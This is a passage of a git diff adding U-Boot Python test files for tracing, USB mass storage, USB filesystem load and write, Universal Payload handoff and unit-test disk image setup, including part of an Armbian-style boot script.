+ fname (str): Filename of trace file + proftool (str): Filename of proftool + map_fname (str): Filename of System.map + trace_fg (str): Filename of output file + + Returns: + int: Approximate number of microseconds used by the initf_dm() function + """ + + # Generate the flamegraph format + out = utils.run_and_log( + ubman, [proftool, '-t', fname, '-o', trace_fg, '-m', map_fname, + 'dump-flamegraph']) + + # We expect dm_timer_init() to be called twice: once before relocation and + # once after + look1 = 'initf_dm;dm_timer_init 1' + look2 = 'board_init_r;initcall_run_list;initr_dm_devices;dm_timer_init 1' + found = 0 + with open(trace_fg, 'r') as fd: + for line in fd: + line = line.strip() + if line == look1 or line == look2: + found += 1 + assert found == 2 + + # Generate the timing graph + utils.run_and_log( + ubman, [proftool, '-t', fname, '-o', trace_fg, '-m', map_fname, + 'dump-flamegraph', '-f', 'timing']) + + # Add up all the time spend in initf_dm() and its children + total = 0 + with open(trace_fg, 'r') as fd: + for line in fd: + line = line.strip() + if line.startswith('initf_dm'): + func, val = line.split() + count = int(val) + total += count + return total + +check_flamegraph +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('trace') +def test_trace(ubman): + """Test we can build sandbox with trace, collect and process a trace""" + + if not os.path.exists(TMPDIR): + os.mkdir(TMPDIR) + proftool = os.path.join(ubman.config.build_dir, 'tools', 'proftool') + map_fname = os.path.join(ubman.config.build_dir, 'System.map') + trace_dat = os.path.join(TMPDIR, 'trace.dat') + trace_fg = os.path.join(TMPDIR, 'trace.fg') + + fname, dm_f_time = collect_trace(ubman) + + check_function(ubman, fname, proftool, map_fname, trace_dat) + trace_time = check_funcgraph(ubman, fname, proftool, map_fname, trace_dat) + + # Check that bootstage and funcgraph agree to within 10 microseconds + diff = abs(trace_time - dm_f_time) + print(f'trace_time {trace_time}, dm_f_time {dm_f_time}') + assert diff / dm_f_time < 0.01 + + fg_time = check_flamegraph(ubman, fname, proftool, map_fname, trace_fg) + + # Check that bootstage and flamegraph agree to within 30% + # This allows for CI being slow to run + diff = abs(fg_time - dm_f_time) + assert diff / dm_f_time < 0.3 + + # Check that the trace buffer can be wiped + numcalls = wipe_and_collect_trace(ubman) + assert numcalls == 0 diff --git a/test/py/tests/test_ums.py b/test/py/tests/test_ums.py new file mode 100644 index 00000000000..caf6c0a7270 --- /dev/null +++ b/test/py/tests/test_ums.py @@ -0,0 +1,231 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Test U-Boot's "ums" command. The test starts UMS in U-Boot, waits for USB +# device enumeration on the host, reads a small block of data from the UMS +# block device, optionally mounts a partition and performs filesystem-based +# read/write tests, and finally aborts the "ums" command in U-Boot. + +import os +import os.path +import pytest +import re +import time +import utils + +""" +Note: This test relies on: + +a) boardenv_* to contain configuration values to define which USB ports are +available for testing. Without this, this test will be automatically skipped. +For example: + +# Leave this list empty if you have no block_devs below with writable +# partitions defined. +env__mount_points = ( + '/mnt/ubtest-mnt-p2371-2180-na', +) + +env__usb_dev_ports = ( + { + 'fixture_id': 'micro_b', + 'tgt_usb_ctlr': '0', + 'host_ums_dev_node': '/dev/disk/by-path/pci-0000:00:14.0-usb-0:13:1.0-scsi-0:0:0:0', + }, +) + +env__block_devs = ( + # eMMC; always present + { + 'fixture_id': 'emmc', + 'type': 'mmc', + 'id': '0', + # The following two properties are optional. + # If present, the partition will be mounted and a file written-to and + # read-from it. If missing, only a simple block read test will be + # performed. + 'writable_fs_partition': 1, + 'writable_fs_subdir': 'tmp/', + }, + # SD card; present since I plugged one in + { + 'fixture_id': 'sd', + 'type': 'mmc', + 'id': '1' + }, +) + +b) udev rules to set permissions on devices nodes, so that sudo is not +required. For example: + +ACTION=="add", SUBSYSTEM=="block", SUBSYSTEMS=="usb", KERNELS=="3-13", MODE:="666" + +(You may wish to change the group ID instead of setting the permissions wide +open. All that matters is that the user ID running the test can access the +device.) + +c) /etc/fstab entries to allow the block device to be mounted without requiring +root permissions. For example: + +/dev/disk/by-path/pci-0000:00:14.0-usb-0:13:1.0-scsi-0:0:0:0-part1 /mnt/ubtest-mnt-p2371-2180-na ext4 noauto,user,nosuid,nodev + +This entry is only needed if any block_devs above contain a +writable_fs_partition value. +""" + +@pytest.mark.buildconfigspec('cmd_usb_mass_storage') +def test_ums(ubman, env__usb_dev_port, env__block_devs): + """Test the "ums" command; the host system must be able to enumerate a UMS + device when "ums" is running, block and optionally file I/O are tested, + and this device must disappear when "ums" is aborted. + + Args: + ubman: A U-Boot console connection. + env__usb_dev_port: The single USB device-mode port specification on + which to run the test. See the file-level comment above for + details of the format. + env__block_devs: The list of block devices that the target U-Boot + device has attached. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + have_writable_fs_partition = 'writable_fs_partition' in env__block_devs[0] + if not have_writable_fs_partition: + # If 'writable_fs_subdir' is missing, we'll skip all parts of the + # testing which mount filesystems. + ubman.log.warning( + 'boardenv missing "writable_fs_partition"; ' + + 'UMS testing will be limited.') + + tgt_usb_ctlr = env__usb_dev_port['tgt_usb_ctlr'] + host_ums_dev_node = env__usb_dev_port['host_ums_dev_node'] + + # We're interested in testing USB device mode on each port, not the cross- + # product of that with each device. So, just pick the first entry in the + # device list here. We'll test each block device somewhere else. + tgt_dev_type = env__block_devs[0]['type'] + tgt_dev_id = env__block_devs[0]['id'] + if have_writable_fs_partition: + mount_point = ubman.config.env['env__mount_points'][0] + mount_subdir = env__block_devs[0]['writable_fs_subdir'] + part_num = env__block_devs[0]['writable_fs_partition'] + host_ums_part_node = '%s-part%d' % (host_ums_dev_node, part_num) + test_f = utils.PersistentRandomFile(ubman, 'ums.bin', 1024 * 1024); + mounted_test_fn = mount_point + '/' + mount_subdir + test_f.fn + else: + host_ums_part_node = host_ums_dev_node + + def start_ums(): + """Start U-Boot's ums shell command. + + This also waits for the host-side USB enumeration process to complete. + + Args: + None. + + Returns: + Nothing. + """ + + ubman.log.action( + 'Starting long-running U-Boot ums shell command') + cmd = 'ums %s %s %s' % (tgt_usb_ctlr, tgt_dev_type, tgt_dev_id) + ubman.run_command(cmd, wait_for_prompt=False) + ubman.wait_for(re.compile('UMS: LUN.*[\r\n]')) + fh = utils.wait_until_open_succeeds(host_ums_part_node) + ubman.log.action('Reading raw data from UMS device') + fh.read(4096) + fh.close() + + def mount(): + """Mount the block device that U-Boot exports. + + Args: + None. + + Returns: + Nothing. + """ + + ubman.log.action('Mounting exported UMS device') + cmd = ('/bin/mount', host_ums_part_node) + utils.run_and_log(ubman, cmd) + + def umount(ignore_errors): + """Unmount the block device that U-Boot exports. + + Args: + ignore_errors: Ignore any errors. This is useful if an error has + already been detected, and the code is performing best-effort + cleanup. In this case, we do not want to mask the original + error by "honoring" any new errors. + + Returns: + Nothing. + """ + + ubman.log.action('Unmounting UMS device') + cmd = ('/bin/umount', host_ums_part_node) + utils.run_and_log(ubman, cmd, ignore_errors) + + def stop_ums(ignore_errors): + """Stop U-Boot's ums shell command from executing. + + This also waits for the host-side USB de-enumeration process to + complete. + + Args: + ignore_errors: Ignore any errors. This is useful if an error has + already been detected, and the code is performing best-effort + cleanup. In this case, we do not want to mask the original + error by "honoring" any new errors. + + Returns: + Nothing. + """ + + ubman.log.action( + 'Stopping long-running U-Boot ums shell command') + ubman.ctrlc() + utils.wait_until_file_open_fails(host_ums_part_node, + ignore_errors) + + ignore_cleanup_errors = True + if have_writable_fs_partition: + try: + start_ums() + try: + mount() + ubman.log.action('Writing test file via UMS') + cmd = ('rm', '-f', mounted_test_fn) + utils.run_and_log(ubman, cmd) + if os.path.exists(mounted_test_fn): + raise Exception('Could not rm target UMS test file') + cmd = ('cp', test_f.abs_fn, mounted_test_fn) + utils.run_and_log(ubman, cmd) + ignore_cleanup_errors = False + finally: + umount(ignore_errors=ignore_cleanup_errors) + finally: + stop_ums(ignore_errors=ignore_cleanup_errors) + + ignore_cleanup_errors = True + try: + start_ums() + try: + mount() + ubman.log.action('Reading test file back via UMS') + read_back_hash = utils.md5sum_file(mounted_test_fn) + cmd = ('rm', '-f', mounted_test_fn) + utils.run_and_log(ubman, cmd) + ignore_cleanup_errors = False + finally: + umount(ignore_errors=ignore_cleanup_errors) + finally: + stop_ums(ignore_errors=ignore_cleanup_errors) + + written_hash = test_f.content_hash + assert(written_hash == read_back_hash) diff --git a/test/py/tests/test_unknown_cmd.py b/test/py/tests/test_unknown_cmd.py new file mode 100644 index 00000000000..b40c57f8a10 --- /dev/null +++ b/test/py/tests/test_unknown_cmd.py @@ -0,0 +1,13 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +def test_unknown_command(ubman): + """Test that executing an unknown command causes U-Boot to print an + error.""" + + # The "unknown command" error is actively expected here, + # so error detection for it is disabled. + with ubman.disable_check('unknown_command'): + response = ubman.run_command('non_existent_cmd') + assert('Unknown command \'non_existent_cmd\' - try \'help\'' in response) diff --git a/test/py/tests/test_upl.py b/test/py/tests/test_upl.py new file mode 100644 index 00000000000..c79c32adf0b --- /dev/null +++ b/test/py/tests/test_upl.py @@ -0,0 +1,37 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2024 Google LLC +# +# Test addition of Universal Payload + +import os + +import pytest +import utils + +@pytest.mark.boardspec('sandbox_vpl') +def test_upl_handoff(ubman): + """Test of UPL handoff + + This works by starting up U-Boot VPL, which gets to SPL and then sets up a + UPL handoff using the FIT containing U-Boot proper. It then jumps to U-Boot + proper and runs a test to check that the parameters are correct. + + The entire FIT is loaded into memory in SPL (in upl_load_from_image()) so + that it can be inspected in upl_test_info_norun + """ + ram = os.path.join(ubman.config.build_dir, 'ram.bin') + fdt = os.path.join(ubman.config.build_dir, 'u-boot.dtb') + + # Remove any existing RAM file, so we don't have old data present + if os.path.exists(ram): + os.remove(ram) + flags = ['-m', ram, '-d', fdt, '--upl'] + ubman.restart_uboot_with_flags(flags, use_dtb=False) + + # Make sure that Universal Payload is detected in U-Boot proper + output = ubman.run_command('upl info') + assert 'UPL state: active' == output + + # Check the FIT offsets look correct + output = ubman.run_command('ut upl -f upl_test_info_norun') + assert 'failures: 0' in output diff --git a/test/py/tests/test_usb.py b/test/py/tests/test_usb.py new file mode 100644 index 00000000000..1dcd0834f55 --- /dev/null +++ b/test/py/tests/test_usb.py @@ -0,0 +1,634 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import re +import utils + +""" +Note: This test doesn't rely on boardenv_* configuration values but it can +change the test behavior. To test USB file system cases (fat32, ext2, ext4), +USB device should be formatted and valid partitions should be created for +different file system, otherwise it may leads to failure. This test will be +skipped if the USB device is not detected. + +For example: + +# Setup env__usb_device_test_skip to not skipping the test. By default, its +# value is set to True. Set it to False to run all tests for USB device. +env__usb_device_test_skip = False +""" + +def setup_usb(ubman): + if ubman.config.env.get('env__usb_device_test_skip', True): + pytest.skip('USB device test is not enabled') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_start(ubman): + setup_usb(ubman) + output = ubman.run_command('usb start') + + # if output is empty, usb start may already run as part of preboot command + # re-start the usb, in that case + if not output: + ubman.run_command('usb stop') + output = ubman.run_command('usb start') + + if 'No USB device found' in output: + pytest.skip('No USB controller available') + + if 'Card did not respond to voltage select' in output: + pytest.skip('No USB device present') + + controllers = 0 + storage_device = 0 + obj = re.search(r'\d USB Device\(s\) found', output) + controllers = int(obj.group()[0]) + + if not controllers: + pytest.skip('No USB device present') + + obj = re.search(r'\d Storage Device\(s\) found', output) + storage_device = int(obj.group()[0]) + + if not storage_device: + pytest.skip('No USB storage device present') + + assert 'USB init failed' not in output + assert 'starting USB...' in output + + if 'Starting the controller' in output: + assert 'USB XHCI' in output + + output = ubman.run_command('echo $?') + assert output.endswith('0') + return controllers, storage_device + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_stop(ubman): + setup_usb(ubman) + output = ubman.run_command('usb stop') + assert 'stopping USB..' in output + + output = ubman.run_command('echo $?') + assert output.endswith('0') + + output = ubman.run_command('usb dev') + assert "USB is stopped. Please issue 'usb start' first." in output + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_reset(ubman): + setup_usb(ubman) + output = ubman.run_command('usb reset') + + if 'No USB device found' in output: + pytest.skip('No USB controller available') + + if 'Card did not respond to voltage select' in output: + pytest.skip('No USB device present') + + obj = re.search(r'\d USB Device\(s\) found', output) + usb_dev_num = int(obj.group()[0]) + + if not usb_dev_num: + pytest.skip('No USB device present') + + obj = re.search(r'\d Storage Device\(s\) found', output) + usb_stor_num = int(obj.group()[0]) + + if not usb_stor_num: + pytest.skip('No USB storage device present') + + assert 'BUG' not in output + assert 'USB init failed' not in output + assert 'resetting USB...' in output + + if 'Starting the controller' in output: + assert 'USB XHCI' in output + + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_info(ubman): + controllers, storage_device = test_usb_start(ubman) + output = ubman.run_command('usb info') + + num_controller = len(re.findall(': Hub,', output)) + num_mass_storage = len(re.findall(': Mass Storage,', output)) + + assert num_controller == controllers - 1 + assert num_mass_storage == storage_device + + output = ubman.run_command('echo $?') + assert output.endswith('0') + + for i in range(0, storage_device + controllers - 1): + output = ubman.run_command('usb info %d' % i) + num_controller = len(re.findall(': Hub,', output)) + num_mass_storage = len(re.findall(': Mass Storage,', output)) + assert num_controller + num_mass_storage == 1 + assert 'No device available' not in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_tree(ubman): + controllers, storage_device = test_usb_start(ubman) + output = ubman.run_command('usb tree') + + num_controller = len(re.findall('Hub', output)) + num_mass_storage = len(re.findall('Mass Storage', output)) + + assert num_controller == controllers - 1 + assert num_mass_storage == storage_device + + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('usb_storage') +def test_usb_storage(ubman): + controllers, storage_device = test_usb_start(ubman) + output = ubman.run_command('usb storage') + + obj = re.findall(r'Capacity: (\d+|\d+[\.]?\d)', output) + devices = {} + + for key in range(int(storage_device)): + devices[key] = {} + + for x in range(int(storage_device)): + try: + capacity = float(obj[x].split()[0]) + devices[x]['capacity'] = capacity + print('USB storage device %d capacity is: %g MB' % (x, capacity)) + except ValueError: + pytest.fail('USB storage device capacity not recognized') + + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_dev(ubman): + controllers, storage_device = test_usb_start(ubman) + output = ubman.run_command('usb dev') + + assert 'no usb devices available' not in output + + output = ubman.run_command('echo $?') + assert output.endswith('0') + + devices = {} + + for key in range(int(storage_device)): + devices[key] = {} + + fail = 0 + for x in range(0, storage_device): + devices[x]['detected'] = 'yes' + output = ubman.run_command('usb dev %d' % x) + + if 'Card did not respond to voltage select' in output: + fail = 1 + devices[x]['detected'] = 'no' + + if 'No USB device found' in output: + devices[x]['detected'] = 'no' + + if 'unknown device' in output: + devices[x]['detected'] = 'no' + + assert 'is now current device' in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + + if fail: + pytest.fail('USB device not present') + + return devices, controllers, storage_device + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_part(ubman): + devices, controllers, storage_device = test_usb_dev(ubman) + if not devices: + pytest.skip('No devices detected') + + ubman.run_command('usb part') + + output = ubman.run_command('echo $?') + assert output.endswith('0') + + for i in range(0, storage_device): + if devices[i]['detected'] == 'yes': + ubman.run_command('usb dev %d' % i) + output = ubman.run_command('usb part') + + lines = output.split('\n') + part_fat = [] + part_ext2 = [] + part_ext4 = [] + for line in lines: + obj = re.search(r'(\d)\s+\d+\s+\d+\s+\w+\d+\w+-\d+\s+(\d+\w+)', line) + if obj: + part_id = int(obj.groups()[0]) + part_type = obj.groups()[1] + print('part_id:%d, part_type:%s' % (part_id, part_type)) + + if part_type == '0c' or part_type == '0b' or part_type == '0e': + print('Fat detected') + part_fat.append(part_id) + elif part_type == '83': + print('ext(2/4) detected') + output = ubman.run_command( + 'fstype usb %d:%d' % (i, part_id) + ) + if 'ext2' in output: + part_ext2.append(part_id) + elif 'ext4' in output: + part_ext4.append(part_id) + else: + pytest.fail('Unsupported Filesystem on device %d' % i) + devices[i]['ext4'] = part_ext4 + devices[i]['ext2'] = part_ext2 + devices[i]['fat'] = part_fat + + if not part_ext2 and not part_ext4 and not part_fat: + pytest.fail('No partition detected on device %d' % i) + + return devices, controllers, storage_device + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fat') +def test_usb_fatls_fatinfo(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + output = ubman.run_command('fatls usb %d:%s' % (x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + + if not re.search(r'\d file\(s\), \d dir\(s\)', output): + pytest.fail('%s read failed on device %d' % (fs.upper, x)) + + output = ubman.run_command('fatinfo usb %d:%s' % (x, part)) + string = 'Filesystem: %s' % fs.upper + if re.search(string, output): + pytest.fail('%s FS failed on device %d' % (fs.upper(), x)) + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +def usb_fatload_fatwrite(ubman, fs, x, part): + addr = utils.find_ram_base(ubman) + size = random.randint(4, 1 * 1024 * 1024) + output = ubman.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + + file = '%s_%d' % ('uboot_test', size) + output = ubman.run_command( + '%swrite usb %d:%s %x %s %x' % (fs, x, part, addr, file, size) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size + assert expected_text in output + + alignment = int( + ubman.config.buildconfig.get( + 'config_sys_cacheline_size', 128 + ) + ) + offset = random.randrange(alignment, 1024, alignment) + output = ubman.run_command( + '%sload usb %d:%s %x %s' % (fs, x, part, addr + offset, file) + ) + assert 'Invalid FAT entry' not in output + assert 'Unable to read file' not in output + assert 'Misaligned buffer address' not in output + expected_text = '%d bytes read' % size + assert expected_text in output + + output = ubman.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + return file, size, expected_crc32 + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +def test_usb_fatload_fatwrite(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + usb_fatload_fatwrite(ubman, fs, x, part) + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext4') +def test_usb_ext4ls(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext4' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + ubman.run_command('usb dev %d' % x) + for part in partitions: + output = ubman.run_command('%sls usb %d:%s' % (fs, x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +def usb_ext4load_ext4write(ubman, fs, x, part): + addr = utils.find_ram_base(ubman) + size = random.randint(4, 1 * 1024 * 1024) + output = ubman.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + file = '%s_%d' % ('uboot_test', size) + + output = ubman.run_command( + '%swrite usb %d:%s %x /%s %x' % (fs, x, part, addr, file, size) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size + assert expected_text in output + + offset = random.randrange(128, 1024, 128) + output = ubman.run_command( + '%sload usb %d:%s %x /%s' % (fs, x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = ubman.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + return file, size, expected_crc32 + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext4') +@pytest.mark.buildconfigspec('cmd_ext4_write') +@pytest.mark.buildconfigspec('cmd_memory') +def test_usb_ext4load_ext4write(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext4' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + usb_ext4load_ext4write(ubman, fs, x, part) + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext2') +def test_usb_ext2ls(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext2' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + output = ubman.run_command('%sls usb %d:%s' % (fs, x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext2') +@pytest.mark.buildconfigspec('cmd_ext4') +@pytest.mark.buildconfigspec('cmd_ext4_write') +@pytest.mark.buildconfigspec('cmd_memory') +def test_usb_ext2load(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext2' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + file, size, expected_crc32 = \ + usb_ext4load_ext4write(ubman, fs, x, part) + addr = utils.find_ram_base(ubman) + + offset = random.randrange(128, 1024, 128) + output = ubman.run_command( + '%sload usb %d:%s %x /%s' % (fs, x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = ubman.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_usb_ls(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + for fs in ['fat', 'ext2', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + output = ubman.run_command('ls usb %d:%s' % (x, part)) + if re.search(r'No \w+ table on this device', output): + pytest.fail( + '%s: Partition table not found %d' % (fs.upper(), x) + ) + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext4_write') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_usb_load(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + for fs in ['fat', 'ext2', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = utils.find_ram_base(ubman) + + if fs == 'fat': + file, size, expected_crc32 = \ + usb_fatload_fatwrite(ubman, fs, x, part) + elif fs in ['ext4', 'ext2']: + file, size, expected_crc32 = \ + usb_ext4load_ext4write(ubman, fs, x, part) + else: + raise Exception('Unsupported filesystem type %s' % fs) + + offset = random.randrange(128, 1024, 128) + output = ubman.run_command( + 'load usb %d:%s %x /%s' % (x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = ubman.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_usb_save(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + for fs in ['fat', 'ext2', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = utils.find_ram_base(ubman) + size = random.randint(4, 1 * 1024 * 1024) + file = '%s_%d' % ('uboot_test', size) + + offset = random.randrange(128, 1024, 128) + output = ubman.run_command( + 'save usb %d:%s %x /%s %x' + % (x, part, addr + offset, file, size) + ) + expected_text = '%d bytes written' % size + assert expected_text in output + + if not part_detect: + pytest.skip('No partition detected') diff --git a/test/py/tests/test_ut.py b/test/py/tests/test_ut.py new file mode 100644 index 00000000000..ea0c43cd4fc --- /dev/null +++ b/test/py/tests/test_ut.py @@ -0,0 +1,610 @@ +# SPDX-License-Identifier: GPL-2.0 +""" +Unit-test runner + +Provides a test_ut() function which is used by conftest.py to run each unit +test one at a time, as well setting up some files needed by the tests. + +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. +""" +import collections +import gzip +import os +import os.path +import pytest + +import utils +# pylint: disable=E0611 +from tests import fs_helper +from test_android import test_abootimg + +def mkdir_cond(dirname): + """Create a directory if it doesn't already exist + + Args: + dirname (str): Name of directory to create + """ + if not os.path.exists(dirname): + os.mkdir(dirname) + +def setup_image(ubman, devnum, part_type, img_size=20, second_part=False, + basename='mmc'): + """Create a disk image with a single partition + + Args: + ubman (ConsoleBase): Console to use + devnum (int): Device number to use, e.g. 1 + part_type (int): Partition type, e.g. 0xc for FAT32 + img_size (int): Image size in MiB + second_part (bool): True to contain a small second partition + basename (str): Base name to use in the filename, e.g. 'mmc' + + Returns: + tuple: + str: Filename of MMC image + str: Directory name of scratch directory + """ + fname = os.path.join(ubman.config.source_dir, f'{basename}{devnum}.img') + mnt = os.path.join(ubman.config.persistent_data_dir, 'scratch') + mkdir_cond(mnt) + + spec = f'type={part_type:x}, size={img_size - 2}M, start=1M, bootable' + if second_part: + spec += '\ntype=c' + + utils.run_and_log(ubman, f'qemu-img create {fname} 20M') + utils.run_and_log(ubman, f'sfdisk {fname}', + stdin=spec.encode('utf-8')) + return fname, mnt + +def setup_bootmenu_image(ubman): + """Create a 20MB disk image with a single ext4 partition + + This is modelled on Armbian 22.08 Jammy + """ + mmc_dev = 4 + fname, mnt = setup_image(ubman, mmc_dev, 0x83) + + script = '''# DO NOT EDIT THIS FILE +# +# Please edit /boot/armbianEnv.txt to set supported parameters +# + +setenv load_addr "0x9000000" +setenv overlay_error "false" +# default values +setenv rootdev "/dev/mmcblk%dp1" +setenv verbosity "1" +setenv console "both" +setenv bootlogo "false" +setenv rootfstype "ext4" +setenv docker_optimizations "on" +setenv earlycon "off" + +echo "Boot script loaded from ${devtype} ${devnum}" + +if test -e ${devtype} ${devnum} ${prefix}armbianEnv.txt; then + load ${devtype} ${devnum} ${load_addr} ${prefix}armbianEnv.txt + env import -t ${load_addr} ${filesize} +fi + +if test "${logo}" = "disabled"; then setenv logo "logo.nologo"; fi + +if test "${console}" = "display" || test "${console}" = "both"; then setenv consoleargs "console=tty1"; fi +if test "${console}" = "serial" || test "${console}" = "both"; then setenv consoleargs "console=ttyS2,1500000 ${consoleargs}"; fi +if test "${earlycon}" = "on"; then setenv consoleargs "earlycon ${consoleargs}"; fi +if test "${bootlogo}" = "true"; then setenv consoleargs "bootsplash.bootfile=bootsplash.armbian ${consoleargs}"; fi + +# get PARTUUID of first partition on SD/eMMC the boot script was loaded from +if test "${devtype}" = "mmc"; then part uuid mmc ${devnum}:1 partuuid; fi + +setenv bootargs "root=${rootdev} rootwait rootfstype=${rootfstype} ${consoleargs} consoleblank=0 loglevel=${verbosity} ubootpart=${partuuid} usb-storage.quirks=${usbstoragequirks} ${extraargs} ${extraboardargs}" + +if test "${docker_optimizations}" = "on"; then setenv bootargs "${bootargs} cgroup_enable=cpuset cgroup_memory=1 cgroup_enable=memory swapaccount=1"; fi + +load ${devtype} ${devnum} ${ramdisk_addr_r} ${prefix}uInitrd +load ${devtype} ${devnum} ${kernel_addr_r} ${prefix}Image + +load ${devtype} ${devnum} ${fdt_addr_r} 